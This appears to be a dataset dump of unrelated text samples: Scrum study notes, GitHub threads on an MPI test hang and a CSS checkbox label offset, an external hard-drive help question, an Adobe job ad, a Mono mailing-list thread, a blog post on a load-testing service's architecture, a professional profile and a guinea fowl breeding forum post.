Document
stringlengths
395
24.5k
Source
stringclasses
6 values
The Scrum Framework : - The Scrum Framework consists of Scrum Teams and their associated events, artifacts, and roles as defined in the Scrum Guide. - According to the Scrum Guide, mandatory rules and principles of Scrum are Scrum Roles, Scrum Events, Sprint Goal, Product Backlog, Sprint Backlog, Increment, Definition of Done, and Monitoring progress in Sprint and Project levels. Other things are practices that can be employed in the Scrum framework and are up to the team and project and are not mandatory. The Scrum roles : - Product Owner - Development Team (Developers) - Scrum Master The Scrum artifacts : - Artifacts represent work or value to provide transparency and opportunities for inspection and adaption. - Artifacts are defined by Scrum and designed to maximize transparency of key information so that everybody has the same understanding. - Product Backlog - Sprint backlog The Scrum events : - Sprint Planning - Daily Scrum - Sprint Review - Sprint Retrospective - The Sprint is the container for all events - According to the Scrum Guide, mandatory rules and principles of Scrum are Scrum Roles, Scrum Events, Sprint Goal, Product Backlog, Sprint Backlog, Increment, Definition of Done, and Monitoring progress in Sprint and Project levels. Other things are practices that could employ in the Scrum framework and are up to the team and project and are not mandatory. - Events present an opportunity in the Sprint for something to be inspected or adopted. - Events are designed to enable transparency and inspection - There are totally 5 events in the Scrum framework as Sprint, Sprint Planning, Daily Scrum, Sprint Review, and Sprint Retrospective. - Four Events of Inspection & Adaption 1. Sprint Planning 2. Daily Scrum 3. Sprint Review 4. Sprint Retrospective - The Sprint is a container for other events. - All four Scrum events are a type of feedback loop or inspect and adapt opportunities include Sprint Planning, Daily Scrum, Sprint Review, and Sprint Retrospective. Although Sprint is an event its role is being a container for other events. Product Backlog refinement is a continuous activity and is not a feedback loop. Sprint Planning : - Sprint Planning is a time-boxed event of 8 hours or less to start a Sprint. - Sprint Planning is a mandatory event of Scrum and is a feedback loop that team members can inspect the Product Backlog and select enough work to develop during the Sprint. It should be conducted at the beginning of each Sprint. - The Sprint Planning is time-boxed to a maximum of eight hours for a one-month Sprint. For shorter sprints, it is usually shorter. Sprint Planning purpose : - Sprint Planning serves to inspect the work from the Product Backlog that is most valuable to be done next, and to design this work into the Sprint Backlog. - Outputs of Sprint Planning are the Sprint Goal and Sprint Backlog which itself contains selected Product Backlog Items and their related tasks. Sprint Planning participants : - The Scrum Team. - The Sprint Goal is created through all Scrum Team members’ collaboration. Sprint Planning practice : - In the Sprint Planning, usually, enough tasks are defined for the early days of the Sprint, and other tasks emerge during the Sprint when the Development Team learns more about the work, new tasks are added during the Daily Scrum. - Creating the Sprint Backlog is a collaborative work that is done by the Development Team members during the Sprint Planning not before or after it. - During Sprint Planning, the Sprint Backlog should be groomed / defined enough so the development Team can create its best forecast of what it can do and start the first several days of the Sprint. - Sprint Planning answers what two questions? 1. What can be delivered in the Increment for this Sprint? 2. How will required work be achieved? - The three Sprint Planning meeting inputs are : 1. Product Backlog 2. Projected Development Capacity 3. Past Development Performance More informations for the Scrum PSD certification here.
OPCFW_CODE
BUG: fix elusive MPI runtime error in tests closes #406 Finally figured it out. Our MPIBackend unit tests use a reduced network model to speed things up. This revealed a rare edge case that only shows up on machines with a large number of logical cores, where more MPI threads were created than there were neurons contributing to the dipole. When NetworkBuilder().aggregate_data() then tried to add up and reduce its NEURON data instances across both intra-rank and inter-rank neurons, it hung due to to a mismatch between h.Vector() sizes. @cjayb All the tests on your M1 Mac should pass after this PR. Feel free to give it a try if you feel inspired! @cjayb All the tests on your M1 Mac should pass after this PR. Feel free to give it a try if you feel inspired! I did, and they do! Amazing sleuthing @rythorpe —tip of the old hat to you, Sir! Codecov Report Merging #545 (1995230) into master (52ee292) will decrease coverage by 0.01%. The diff coverage is 92.85%. @@ Coverage Diff @@ ## master #545 +/- ## ========================================== - Coverage 90.24% 90.23% -0.02% ========================================== Files 20 20 Lines 3988 3992 +4 ========================================== + Hits 3599 3602 +3 - Misses 389 390 +1 Impacted Files Coverage Δ hnn_core/network_builder.py 93.83% <90.90%> (-0.27%) :arrow_down: hnn_core/network.py 92.16% <100.00%> (ø) hnn_core/parallel_backends.py 82.36% <100.00%> (+0.04%) :arrow_up: Help us with your feedback. Take ten seconds to tell us how you rate us. Have a feature suggestion? Share it here. Very cool! What was the reason that the test was failing intermittently? Is their some non-deterministic part in the rank assignment? What was the reason that the test was failing intermittently? I'd call this a consistent issue for those of us with more >6 logical cores. The oversubscription test creates 1.5x threads—for my 8 cores this is 12. There are 3 x 3 == 9 grid points in the test network, each with 2 pyramidal cells that contribute to the aggregate dipole moment. The gid assignment starts by looping over cells, which 'run out' at 18—that leaves 24-18==6 threads without a cell that contributes, which chokes the post-simulation reduction operations. Sound right @rythorpe ? The CI tests run on less than 6 cores, hence no problem. Yes, that's exactly it! looks good! I'm trying to enable auto-merge ... will see if I can make it work on this PR Thanks @rythorpe !!! 🥳 This certainly deserves a celebration
GITHUB_ARCHIVE
HDD working on Mac but asks to be formatted on PC I have a 1TB Toshiba external HDD, 2 years old. A few days ago it suddenly stopped showing up on my PC. Whenever I connect it, the system asks if I wish to format the HDD and I cannot access my years of stored data. Surprisingly, if I connect it to my Mac, it shows up and is even accessible. But the Mac is in the office I cannot waste time recovering data. How do I remedy this issue and what's the cause for it? I believe some sectors from my HDD may have failed. Any suggestions for a way to recover my data? I can format the disk once the data is recovered and see if it still works. Your data can't be that important if you 'waste time' on your easiest recovery method. I would prefer to work i the office. Not to mention the fact that we have a strict data confidentiality policy. So me connecting my HDD to the officce mac could be counter productive. Plus My mac doesnt have nearly enough space to recover everything. Try Paragon NTFS. Paragon NTFS effectively solves the communication problems between the Mac system and NTFS, providing full read and write access to Windows NTFS partitions under OS X. @Davidenko You've got it backwards. The drive works for the OP on a Mac, but not on Windows. Honestly, step 1 is BACKUP THAT DATA. If this is your only backup and something funny is happening, you need to backup everything while it's still retrievable, and from here out, always keep more than one backup of information, single-points of failure are the biggest cause of data loss in the world. From there, try to run some dskchk or repair tools for the HDD in question. There are plenty of tools to check/fix HDD booting issues. I would suggest taking that hard drive and an external hard drive to the office. Copy the data from the dying hard drive to the external hard drive. Once all the data is safely on the external hard drive, discard the dying hard drive, purchase another, then move the data back onto it at home. It's possible that the partition is damaged or it just can't be read form Windows for some reason. If MAC is able to mount it properly probably Linux will do as well. You can try booting with some Linux live CD and move the data to a different drive. Once you get all the data copied to another place test the drive using the manufacturer's diagnostics tool. If it's testing in good health you can reformat and use it again. If it didn't have enough power to operate then Windows wouldn't be offering to format it. Windows offers to format it because it doesn't recognize the filesystem as fat or ntfs.
STACK_EXCHANGE
Changing the world through digital experiences is what Adobe’s all about. We give everyone from emerging artists to global brands everything they need to design and deliver exceptional digital experiences! We’re passionate about empowering people to create beautiful and powerful images, videos, and apps, and transform how companies interact with customers across every screen. We’re on a mission to hire the very best and are committed to creating exceptional employee experiences where everyone is respected and has access to equal opportunity. We realize that new ideas can come from everywhere in the organization, and we know the next big idea could be yours! Adobe is bringing together the best-in-breed experiences across Adobe’s Creative Cloud, Document Cloud, and Marketing Cloud into an end-to-end platform that enables people to get more done together. Our cloud platform supports these experiences with a set of services that will reflect a common user model, will support service business models, and will rely on secure and scalable technology. Our team is re-inventing how these offerings come together as a single source of truth for Adobe customers, and we are looking for a product manager to help define and build the next-generation platform and integrations that will be the foundation of our partner and developer ecosystem. The Foundation team offers an impressive suite of developer efficiency products used across Adobe, and they are the backbone to millions of customer experiences. However, there’s always room for improvement. Adobe engineers struggle to discover these products and are largely left to integrate and manage it all themselves. They also must keep pace with ever-evolving practices for ensuring secure, reliable, resilient, and efficient software. We believe that we can better support Adobe engineers by deeper connecting our products across important engineering workflows and raising the level of abstraction to reduce the burden of software and infrastructure ownership operating multi-cloud. We are seeking a senior product manager that will help drive the next evolution of our developer productivity products. Your mission is to simplify and accelerate the software development experience at Adobe. You will deeply understand and triangulate across team needs, product analytics, and external industry innovation to offer outstanding experiences to Adobe engineers. Within Foundation Product Management this is a cross cutting function, and we’re on a mission to raise the level of product thinking across the organization. This is a unique opportunity for you to help shape our product management practices and partner closely with engineering teams through this evolution. What you'll do Drive product vision and strategy for developer efficiency offerings and align with partners Establish our developer experience principles : how our products should feel to developers and the core attributes that we want them to embody Help evolve Platform Engineering’s customer engagement model, communication strategy, support strategy, and prioritization and planning / road mapping practices Deeply understand, document, analyze, and synthesize our developer and partner community needs and create compelling business cases for product development Collaborate with engineering, product managers, architects, and other technical leaders on the execution and delivery of new capabilities Manage internal product requests from business owners, engineering leaders and other cross functional partners Develop release communication plans, identify early adaptors, drive pilots to ensure rapid adoption of new platform offerings Work cross functionally with app teams, like Lightroom, Adobe Experience Manager or Sensei, and with other platform teams within the CTO’s organization, to build and execute on the roadmap Needed for success 7+ years of full-time work experience Strong analytical, organizational, and problem-solving skills to be able to coordinate complicated projects Demonstrated passion for developer productivity and experience Ability to manage in an environment of ambiguity with diverse partners Proven track record to independently drive initiatives end-to-end Articulate and persuasive while able to listen and incorporate the perspectives of others A healthy blend of deep technical knowledge with customer-focused attitude and empathy Write simple applications (Java, Golang, Node, Ruby) to demo workflows to developers or showcase unmet use cases BA / BS in Computer Science, Engineering, Mathematics, Statistics, Business or equivalent Comfortable applying a combination of qualitative and quantitative methods to define success and problem solving without perfect metrics Experience in product management or software engineering with a passion for developer platforms & ecosystems An orientation for execution with a strong process and metrics focus Strong verbal, presentation, and written communication skills as you'll be interacting across product and engineering leaders at various levels
OPCFW_CODE
Checkbox label position 1px/2px too low Description Checkbox label is 1px (desktop) / 2px (mobile) lower than the design Steps to reproduce Go to https://opensource.adobe.com/spectrum-css/components/checkbox/ Screenshot checkbox Compare with UI kit Expected behavior Label should be 1px higher (desktop) or 2px higher (mobile) Screenshots (red is design) desktop: mobile: Environment Spectrum CSS version: Browser(s) and OS(s): Additional context Came across while doing React review. Not sure if this is some rendering issue or not :( sorry if this is not relevant! FYI, looks even more off in Firefox and Edge on both macOS and Windows. More like it's bottom aligned. Here's a FF mac screenshot: thanks @devongovett for the feedback. We did a deeper dive into this and it turns out this 1px rendering bug is coming from "browser jiggering" based on the rendering engine. TLDR; different rendering engines place the baseline differently. I compared a couple of browsers and I might have a potential solution in this commit: https://github.com/adobe/spectrum-css/pull/412/commits/2d6b43ae1a1dca22992df4e1a98af7c6ebbdd3be Here is a comparison on how a couple of evergreen browser might render it differently. We may have to discuss if it is worth it using a "1.49" line-height fix. A couple of solutions point into the direction of just letting this be. Maybe @NateBaldwinDesign might have some good feedback for this situation. Screenshot: @bernhard-adobe so it sounds like setting line-height: 1.49 is a hack to fix the issue in Firefox and Edge, and without it, the label is 1px too low. Personally, I say that's an acceptable solution and I would accept the PR with that change. @GarthDB and @jianliao, your thoughts? Let's get feedback on this by EOD so we can merge. @bernhard-adobe this is pretty crazy. I am fine with changing the line height in those browsers to account for the problem this causes. Considering this is a browser-specific rendering issue w/r/t line heights, I assume this means all components in Firefox and Edge would have this same problem? If so, it seems this is more than just a Checkbox-related issue. Here's where my head is at on this -> For checkbox and all components whose type is derived from Body, the line-height is defined at 1.5x the font size in Latin scripts. A few questions that arise in my mind are this: Would it be better to provide line-heights as multiplier (unitless) values rather than their resolved pixel value? (ie 1.3, 1.5, 1.7)? Would this provide any help regarding these rendering issues? If this is a universal rendering issue and appears on other type sizes, is there a more broad rule we should apply such that for Firefox & Edge, all line heights = line-height - 0.01? correct, this might appear in other components as well. To answer your questions: Which multiplier would you like to use? I tried that with calc but the line-heights I tried it with were PX based and that didn't fix the issue. Using the resolved pixel values worked only in this scenario. That is super strange. Does that solution work at different scales too (e.g. large scale)? What if you zoom in to > 100%? I'd be wary of setting exact numeric values like that... @bernhard-adobe Still appears too low to me on master... Thanks for providing the screenshot @devongovett . May I ask what browser you are using, if your screen is a retina-based screen and the name of the operating system? I have ran the tests again on macOS Mojave 10.14.5 (18F203) on a non-retina Apple Thunderbolt screen 2011 Master at: https://github.com/adobe/spectrum-css/tree/4747bc456053a7ad5bb84a29385f5d00a6029681 Browsers from left to right: Google Chrome Canary Version 81.0.3999.0 (Official Build) canary (64-bit) Firefox Version 71.0 (64-bit) Safari Version 12.1.1 (146<IP_ADDRESS>.1) Microsoft Edge on macOS Version 79.0.309.47 (Official build) Beta (64-bit) Microsoft Edge Version 42.17134.1038.0 in a VMware Fusion on Windows 10 1803, Microsoft EdgeHTML 17.17134 Here the screenshots: notice the correct gap of 1px between the bottom of the checkbox and the label. The only difference I noticed is in Edge in VMware Fusion. A very subtle anti-aliasing can be seen at the bottom of the label. This however could be a false positive as I am running this in a virtual machine on my mac and VMware fusion might scale the DPI rate of my Thunderbolt screen wrong towards Windows. There are a couple of settings in VMware Fusion that allow further customization. Those all look baseline aligned to me, not centered. You're seeing the same as me. We have made this adjustment in react-spectrum to vertically align the labels for checkbox/radio/status light/switch. https://github.com/adobe/react-spectrum-v3/pull/138 This should be discussed in the new year. OH I see the issue. @lazd and I have worked to align those items constantly on the baseline as we thought that was the correct look and feeling. double checking in our Spectrum Specs https://spectrum.corp.adobe.com/page/radio-button/ it appears that those labels are a bit higher than than we expected it. I have correct that this in #458
GITHUB_ARCHIVE
[Mono-dev] minimal mono embedding profile - hpc twist kumpera at gmail.com Wed Oct 3 18:57:25 UTC 2012 On Wed, Oct 3, 2012 at 1:59 PM, sebastian <sebastian at palladiumconsulting.com > We are investigating running mono to enable C# as a computing language in > an HPC framework. There are many strategies for getting maximum speed out > of a program, and one of them involves running a single process per CPU > core and pinning it there. (There are reasons this is good and bad -- I > don't want to debate that at the moment.) > In this case we would want the mono we loaded to be as "small" as possible > in some sense that is probably different than "small" means on a mobile > device. We are happy to consume tons of memory if necessary, but would want > as few threads as possible. If possible, only 1, with the garbage collector > "stopping the world" if necessary. Are there switches or diagnostics to > understand or control this behavior? (Obviously some common programming > paradigms, such as the task pool, are discouraged in this scenario, as we > wouldn't want a thread pool spun up.) Mono only uses one extra thread for finalization. Making all code that runs on the finalizer thread happen on the main thread would be challenging. > To get even more exotic, and I suppose this would require a patch to mono > itself, we would want the memory allocation to be customized to take > advantage of the NUMA on the machine, allocating memory only which is > advantageous to the socket on which our current process is running. Can't a numactl wrapper do all of this? Finally, we may want to tweak the parameters sent to the LLVM compiler to > optimize for runtime speed, even at the cost of very slow compilation. Tweaking llvm parameters require changing mono's source code and pretty much voids any guarantees that the resulting code will work. A lot of LLVM optimizations for some reasons produce bad code when used with mono. Zoltan can better explain this, I guess. Where do we start in understanding the above changes and whether they are > already supported? The documentation for LLVM and the garbage collectors is > excellent at describing the high level approach, but I am at a bit of a > loss when understanding how to tweak the details. For such a thing, you need to dig into the runtime source code as those internals are not documented. -------------- next part -------------- An HTML attachment was scrubbed... More information about the Mono-devel-list
OPCFW_CODE
#ifndef _CRISP_HPP #define _CRISP_HPP #include <vector> #include <iostream> #include <random> #include <tuple> #include "distribution.hpp" using namespace std; // This enum captures the two test outcomes enum TestOutcome { Negative = 0, Positive = 1 }; // This class stores all the outcome information typedef tuple<int,int,int> OutcomeTuple; class Outcome { private: int _individual; int _time; TestOutcome _outcome; public: Outcome(int u, int t, TestOutcome o) : _individual(u), _time(t), _outcome(o) {} Outcome(const OutcomeTuple &o): Outcome(get<0>(o), get<1>(o), get<2>(o)==0?Negative:Positive) {} int getIndividual() { return(_individual); } int getTime() { return(_time); } TestOutcome getOutcome() { return(_outcome); } }; // This class stores all the contact information typedef tuple<int,int,int,int> ContactTuple; class Contact { private: int _fromIndividual; int _toIndividual; int _time; int _count; public: Contact(int u, int v, int t, int count) : _fromIndividual(u), _toIndividual(v), _time(t), _count(count) {}; Contact(const ContactTuple &c): Contact(get<0>(c), get<1>(c), get<2>(c), get<3>(c) ) {} int getTargetIndividual() const { return(_toIndividual); } int getSourceIndividual() const { return(_fromIndividual); } int getTime() const { return(_time); } int getCount() const { return(_count); } }; ostream &operator<<(ostream&, Contact const&); template<typename T> using array1 = vector<T>; template<typename T> using array2 = vector<array1<T>>; template<typename T> using array3 = vector<array2<T>>; template<typename T> using array4 = vector<array3<T>>; class PopulationInfectionStatus { protected: // Total number of individuals S int _noIndividuals; // Total number of time steps T int _noTimeSteps; // Random number generator random_device _rd; mt19937 _gen; // Contacts data vector<vector<vector<tuple<int,int>>>> _contacts; vector<tuple<int,int>> _empty; inline const vector<tuple<int,int>>& _futureContact(int u, int t) const { return t>=0 && t<_noTimeSteps ? _contacts[u][t] : _empty ; } inline const vector<tuple<int,int>>& _pastContact(int u, int t) const { return t>=1 && t<=_noTimeSteps ? _contacts[u][t-1] : _empty ; } // Test outcomes for all people vector<vector<Outcome>> _outcomes; // Distribution of the length of the susceptible phase Geometric _qS; // Distribution of the duration of exposure Distribution _qE; // Distribution of the duration of infectiouness Distribution _qI; // False-Negative rate of the test outcome double _alpha; // False-Positive rate of the test outcome double _beta; // Cached value of p0 double _p0; // Cached value of p1 double _p1; // Cached value of log(1-_p1) double _log1MinusP1; // Maximum & minimum duration of exposure and infectiousness (depends on the discrete distribution qE and qI) int _minExposure; int _minInfectious; int _maxExposure; int _maxInfectious; // Advance the whole model by one time step, adding new contacts and tests virtual void _advance(const vector<ContactTuple>& contacts, const vector<OutcomeTuple>& outcomes, bool updatePrior) = 0; public: PopulationInfectionStatus(int S, int T, const vector<ContactTuple>&, const vector<OutcomeTuple>&, Distribution& qE, Distribution& qI, double alpha, double beta, double p0, double p1, bool=false) : _noIndividuals(S), _noTimeSteps(T), _gen(_rd()), _contacts(_noIndividuals), _outcomes(_noIndividuals), _qS(p0), _qE(qE), _qI(qI), _alpha(alpha), _beta(beta), _p0(p0), _p1(p1), _log1MinusP1(log(1.0-p1)), _minExposure(qE.getMinOutcomeValue()), _minInfectious(qI.getMinOutcomeValue()), _maxExposure(qE.getMaxOutcomeValue()), _maxInfectious(qI.getMaxOutcomeValue()) { } PopulationInfectionStatus(const PopulationInfectionStatus& other) = delete; PopulationInfectionStatus & operator=(const PopulationInfectionStatus &) = delete; // Advance the whole model by one time step, adding new contacts and tests void advance(const vector<ContactTuple>& contacts, const vector<OutcomeTuple>& outcomes) { return _advance(contacts, outcomes, true); } // Get the posterior marginal distributions P(z_{u,t}|D_{contact}, D_{test}) virtual array3<double> getMarginals(int N=0, int burnIn=0, int skip=0) = 0; // Sample posterior mariginals $P_{u,t}(z_{u,t}|D_{contact}, D_{test})$ virtual array3<int> sample( int N, int burnIn=0, int skip=0) = 0; }; #endif
STACK_EDU
It all started off with such a simple idea – we had a client, their site was not performing well, so we started load testing. Now we didn’t have LoadRunner or any other expensive load testing solution to hand, so we opted for a web-based system instead. The system ran really well, in fact it did exactly what we wanted (albeit for a little chunky interface), and an intellectual challenge was born – surely it must be easy as pie to write a script that will zombie a bunch of servers in the cloud and point them at a target… an ethical DDoS So Loadzen was born – as a python shell script and some cobbled together RPC code. It was only after it actually worked and was surprisingly effective that we thought about taking it to market, so the long road started to making it market worthy. As this is a technical blog for technical people, let’s talk about what it does under the hood… The whole system runs of a three-tier architecture: This separation is essentially so that the website acts as a client to the job server, ensuring the machinery that manages and generates tests is fully separated and isolated from the business end. We can bring down the site and the job server will continue running (and retain your results). The job server will spawn generators as needed to meet the specific load requirement as required by the test being run at that moment. But that’s not all, the system actually uses a single thread for each “virtual user”, given we know how many threads any specific generator can support we simply meter out accordingly, this way we can load-share multiple tests on the same load generators, with some processes running one set of test scenarios while the others are running a completely different test. This ensures maximum utilisation of the systems running at that moment (they’re expensive!) and also ensures we’re not just spawning a ton of new servers for each test. This is the basic architecture of the system at the highest level, but there are a few cool little tricks in the overall architecture that we’ll get into later as we discuss the feature set. The standard workflow for a load test is: - Identify your use cases - Create scenarios for those use cases - Determine the ‘mix’ of the use cases (e.g. 20% of visitors will buy something, 50% will bounce and 30% will just browse or search) - Set up the test and the load maximum - Run the test Loadzen does all of the above, the load generators will automatically scale out the ‘mix’ of tests based on the growth rate of the test curve, they will act in complete lock-step to ensure that each ‘wave’ of users starts at the same time and they will strive to introduce some realistic behaviour by running the virtual users at various stages of ‘drunkeness’, varying their step-rate through a scenario randomly so that we simulate more realistic user loads. The Load generators will then record and average out each wave and report the data back to the job server, which stores it and makes it available to a client. The load generators and the job server both work with Python running Pyro RPC, the reason for this choice? Complete object transparency and interropability between client and server, so that load generators have access to jobserver functions and jobservers can pass test objects to load generators with a single function call with no translation layer. This is a little fiddly, but in the end offers us the ability to just code without worrying about data types and formatting errors. Both the job server and the load generators run as instances in Amazon EC2, and are controlled using the rather awesome Boto library for AWS. The website is written in Django with MySQL and a shiny fat server provided by the good folks at Media Temple. Probably the most interesting part of the website is the real-time results and control feed that is induced every time a test is started. This is actually a real-time push feed form the job server that uses a bastardisation of Socket.IO and an EventJS clone for Python called Tornado (from those good folks at live journal) all backed by an infrastructure queue powered using RabbitMQ and Pika. The actual infrastructure for the site looks like this when we introduce these systems back in (and to think, all of this effort just so you get some shiny animations and a graph on a screen!): Can I just say this now: I love RabbitMQ, I have fallen in love with real-time systems thanks to setting this up – it’s amazing how your viewpoint changes when you start thinking in terms of queues and channels and processors. When this feed was set up we briefly considered completely re-tooling the system to have a full-blown RabbitMQ back-end to power ALL of the things. Pragmatism (thankfully) won out. By running a seperate Tornado server to handle the push feed we again managed to decouple everything, this way the thing that manages the transport is decoupled form the web client is decoupled form the work generator, ensuring we can work on each independently and not have a monolithic code base. Making it easy to use The day before launch (I really shouldn’t be admitting this), I wrote the Chrome extension client that made Scenario creation MUCH easier than was originally built into the website (although the manual wizard still had to be built to pave the way for other clients). It’s a massive bit of kit, that works but could always be made better, one of the key things learnt from this exercise is making a decision of when to make something work and when to make something beautiful, we all want to code stunning software and have great code that is well architected, but if you want to get something out the door, you need to make pragmatic choices of when to say “earmark it for the next build, iterate and improve as you go. At the same time, we learnt to ry to identify those bugs that seem niggling that you know will turn into cancerous, nasty, evil blobs that you have to work around because you were too lazy to tackle that nasty problem head on. Anyway, I hope you guys enjoy load testing with Loadzen! Happy coding (and testing),
OPCFW_CODE
Infrastructure Architect @ Nationwide Building Society Bachelor's Degree, Structural Engineering @ The University of Manchester I am an integration and data architect with more than 15 years experience designing and implementing integration solutions founded on SOA principles using technologies such as ESB (IBM WMQ, WMB/IIB, IBM DataPower), Web Services (SOAP, RESTFUL), Java/JEE across a range of industry verticals such as banks (Barclays Bank, HSBC Bank and Llyods Bank) and logistics (TNT Plc). I am an integration and data architect with more than 15 years experience designing and implementing integration solutions founded on SOA principles using technologies such as ESB (IBM WMQ, WMB/IIB, IBM DataPower), Web Services (SOAP, RESTFUL), Java/JEE across a range of industry verticals such as banks (Barclays Bank, HSBC Bank and Llyods Bank) and logistics (TNT Plc). In the application and infrastructure integration space, I have extensive experience of the full project design lifecycle as I have been engaged on many projects from requirements gathering, analysis and design elaboration, design documentation, physical implementation and deliver into production and support. In the data integration and analytics space, I have recent relevant interests in the entire Big Data infrastructure framework ranging from Hadoop ecosystem (HDFS, YARN, MapReduce, Flume, Kafka, Storm, Sqoop, etc) to analytical engines such as Spark. Summary of area of expertise and interests • WebSphere MQ Versions 5.3, 6.0, 7.1, 7.5 and 8.0 • WebSpere MQ MFT, Sterling Connect:Direct • WebSphere Message Broker Version 5/6/7/8, IBM Integration Bus 9.0 • WebSphere DataPower XB62, ITCAM • Web servers (WebSphere Application Server, Apache, Tomcat) • Web service methodology/standards (SOAP, RESTFUL, Apache Axis2, WS-*) • Enterprise Java 8 - Java EE, JMS, JDBC, SQL, ESQL, XML, SOAP, • SOA service design patterns, application design patterns • Object-oriented analysis & design (OOAD) • Architecture design methodologies and notation – UML, BPMN • Unix, Linux, AIX, zOS, AS400, Windows • Networking, TCPIP, Firewalls, Load balancers, PKI (SSL) • Hardware clustering – VCS, PowerHA • Unix shell scripting, Python 3.0 • Some exposure to Scala • Working knowledge of Enterprise Architecture methodologies TOGAF, SysML and ArchiMate • Strong knowledge of the Hadoop ecosystem (HDFS, YARN, MapReduce, Flume, Kafka, Spark, Sqoop) Messaging Middleware Technical Architect @ My main responsibilities in this role consisted of designing, implementing and supporting the entire messaging infrastructure of TNT. This infrastructure comprises the following technology offering; IBM MQ (Versions 6.0, 7.1 and 7.5), IBM WMB (Version 7 and 8), IBM Message Bus (IIB) Version 9, FTP servers, BMC QPASA, IBM DataPower XB62, etc. In this capacity, I was routinely involved in the design reviews of new services, deployment of the designed artifacts in all environments including production, supporting and troubleshooting the various environments including production. I was also involved in the mentoring and knowledge transfer of other team members. From August 2014 to August 2015 (1 year 1 month) Middleware Architect @ In this role, I had two main responsibilities. Firstly, I was in charge of designing a new architectural landscape for the adoption and deployment of IBM Integration Bus Version 9.0. This entailed performing a thorough analysis and review of the existing WebSphere Message Broker Versions 6 and 7 infrastructural estate, reviewing the new IIB Version 9 product, producing detailed design and documentation of the proposed IIB 9 platform, developing installation and administration scripts for building and administering the platform. I also developed migration plans for the migration of the WMB 6 and WMB 7 estate to the proposed IIB 9 platform. In my other role, I was the key messaging architect responsible for developing a new payment infrastructure for the corporate banking division of the bank. This entailed liaising with the project team (business analysts, applications system architect, project managers, etc) to gather and clarify requirements and designing, implementing and testing the solutions using technologies such as WMQ7.5, WMB7, WAS 8, CICS, PKI, JMS, Apache Tomcat, Connect:Direct. From October 2013 to July 2014 (10 months) Middleware Architect @ As a middleware integration architect, I was responsible for designing the middleware infrastructural backbone using WMQ 6, WebSphere DataPower, WMB 6, SonicESB for integrating a number of key business applications, such as Payment System, Internet Banking System, etc. This entailed designing and building a highly available and resilient WMQ interface to Swift using Veritas Cluster Server (VCS) and building connectivity to various other back-end systems. I designed and built a new WMB 6 broker environment which was to be used as the main non-functional testing (NFT) environment From May 2013 to September 2013 (5 months) Halifax, United KingdomMiddleware Architect @ My main role during this assignment was to serve as the integration architect for designing and implementing an Enterprise Service Bus (ESB) infrastructure using the IBM products WMQ 6, WMB6, WAS to support a number of key business systems such as trading systems, payment systems and risk and fraud management systems. This infrastructure extended across a number of hardware platform (Windows, AIX, Sun Solaris, Linux, mainframe), across multiple data centers and national boundaries, and supported connectivity to external organizations. The WMQ infrastructure consisted of a set of queue managers built on VCS hardware clustering technology coupled with WMQ clustering for workload balancing and high availability of the entire infrastructure. On the message broker application development front, I was involved in the design, implemention and deployment into production a number of WMB message flow in ESQL which exposed web services hosted within the broker domain using the secured SOAP transport and TCPIP nodes as the entry point into the domain. These were incorporated into two key business applications, VisionPlus and Falcon. I also developed a number of administrative message flows for the broker domain – a message flow for determining the responsiveness of an execution group/broker by the load balancer and a monitoring message flow for saving accounting and monitoring message into a database. I developed a middleware object documentation standard using Microsoft Visio. This has now been adopted across the department as the main documentation format for middleware documentation. From August 2011 to February 2013 (1 year 7 months) Senior Middleware Specialist @ As a leading member of the messaging middleware team at HSBC Bank Plc, I was responsible for designing, implementing and supporting the messaging infrastructure within HSBC Bank Plc for a large number of business services using IBM WebSphere family of products (WMQ, WMB, WAS, etc) across a wide range of platforms (IBM zOS, IBM iSeries, AIX, Solaris, Linux, Windows). Other skill sets and technologies employed in this role include PKI, SSL, VCS, shell scripting, ITM/Omegamon. From October 2005 to July 2011 (5 years 10 months) Sheffield, United KingdomSoftware Engineer @ As an application developer, my principal responsibilities consisted of developing internet-based payment solutions using a number of technologies such as J2EE (Java, JMS, MQ, Servlets, JSP, XML, EJB), MVC, Design Patterns and UML, Sybase, Eclipse, Apache Tomcat, Sybase-SQL, CVS, Ant, Unix/Linux Scripting, etc From March 2000 to September 2005 (5 years 7 months) Cambridge, United KingdomStructural/Mathematical Analyst @ My role consisted of using mathematical and statistical methods (finite element, finite difference, stochastic calculus, monte carlo simulation) for modelling engineering structures. From March 1997 to February 2000 (3 years) Research Assistant @ Undertake research in the area of the structural integrity of composite materials. I was also in charge of teaching mathematics and computer programming to undergraduates. From September 1994 to February 1997 (2 years 6 months) Southampton, United Kingdom Master's Degree, Structural Engineering @ The University of Manchester From 1991 to 1993 Bachelor's Degree, Structural Engineering @ The University of Manchester From 1988 to 1991 Victor Katte is skilled in: Middleware Solution Architecture: WebSphereMQ, WebSphere Message Broker,, Unix, Enterprise Architecture, Solaris, Middleware, SOA, WebSphere, WebSphere Application Server, SQL, Java Enterprise Edition, Integration, Shell Scripting Looking for a different Get an email address for anyone on LinkedIn with the ContactOut Chrome extension
OPCFW_CODE
I have guineas and have found them to have good fertility in the temperatures that you mentioned. I would recomend against cross-breeding guineas. There are already many experienced guinea breeders creating new color varieties (the last count I saw was 34 different varieties) and I think that it is better to work on improving the varieties that already exist. In my own experience some mutts are nice, some are ugly, but most are so close to one or the other of the parent stock that most people would confuse them with purebreds. For this reason it is best to stay with purebred breeding. Breeding pens are always a good idea so that you can insure a good fertility rate with the proper male to female ratio and only breed the better birds (not the smaller or poorly looking ones). The only cross breedingI would reccomend is creating pied guineafowl. Many people find these to be very good looking. They can be obtained by crossing any white guinea with any colored guinea (although i recommend crossing the white with something dark such as chocolate, purple etc) not something light like buff duddotte or porcelein as it will be hard to see the pied effect. Be careful if you try to get pieds make sure that you have a white guinea, some of the light varieties can look like white guineas but wont produce a pied effect. If you think you have a white guinea look for spots on it. If it has any spots then it is not a white but some other light colored variety. Whites do not have any spots. Hey thanks a lot you guys. Yeah those pied guineas are awful pretty. I will have to set up a breeding pen and try to match out the proper eggs. Friend says he knows he has males but isn't always 100% sure which they are. Going to be a fun week learning how to sex them and then cornering them and banding their legs appropriately. As for sexing guineas I think the best way for most people is to listen to their calls. the males only have a one note alarm call and the females have a two note call that is supposed to sound like "buckwheat". I think it takes a bit of creative interpretation to think the females sound like they are saying buckwheat so just remember if it makes a two note call it is a female. The females helmets are also are lower than the males and tend to be sloped back more, however there can be a lot of variation in helmet size and one of my females has a helmet bigger than that of most of my males. The males helmets tend to be taller and the point more to the center. Also dont worry too much about having multiple males in a breeding cage. As long as they are not really closely confined they normally get along fine. If you are just starting out breeding guineas you could probably just throw all the ones of the same color that you want to breed in one pen and call it good (assuming you think you have a male and a female in the group). I have all my guineas in a common pen when I am not breeding them to make it easier to free range them and I have had little 